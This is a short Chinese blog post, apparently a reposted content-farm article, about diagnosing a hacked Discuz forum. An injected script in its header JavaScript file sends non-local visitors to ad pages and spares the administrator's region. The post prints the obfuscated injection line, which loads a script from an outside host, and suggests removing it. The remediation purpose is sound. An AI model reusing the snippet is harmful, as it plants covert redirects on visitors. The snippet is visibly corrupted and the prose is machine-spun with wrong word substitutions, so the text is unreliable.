网站被挂马，非管理员访问自动跳转到广告页面解决办法

你是否遇到过你的网站打开一会就自动跳转到其余页面，并且这个问题是你的用户告诉你的，而你本身却没有遇到?

网站被挂马，非管理员访问自动跳转到广告页面 怎么解决

discuz挂马弹出页面

通过葱子我细心的对挂马网站作排查，终于让我找到了问题所在。

挂马者是经过在discuz的头部js文件里面添加了劫持js代码，经过判断访问者的IP来实现不一样跳转的。

具体代码以下：

document.write("<163"+"cript src='http://141"+"d.172"+"om"+"1263"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'></s"+"cript>");

能够看出，后面有个“chengdu”代码，这段代码的意思就是IP为成都地区的访问者在访问被挂马页面时不作跳转。其他地区的IP访问者则跳转。

从这段代码咱们就能够看出挂马者是多么的用心险恶。

他首先根据你网站所在地进行判断网站管理员常常使用的IP地址所在地，而后有针对性的对网站管理员不作跳转劫持。

因此，这种劫持的状况下，网站管理者很是难以发现到网站被挂马了。

解决办法也比较简单：

首先校验下原始文件，对比下哪些js文件近期有被改动过，而后针对被改动过的js文件作以上代码段的排除。找到以上代码段后，删除便可。

最后说一下，各位网站管理者必定要注意保管好网站和服务器的管理密码，尽可能设置的复杂一点。同时也要及时检测服务器是否存在漏洞等，及时作针对性处理，以免相似的事情再发生。

本文由甲爪cpa联盟整理编辑！原文连接www.jiazhua.com 转载请注明！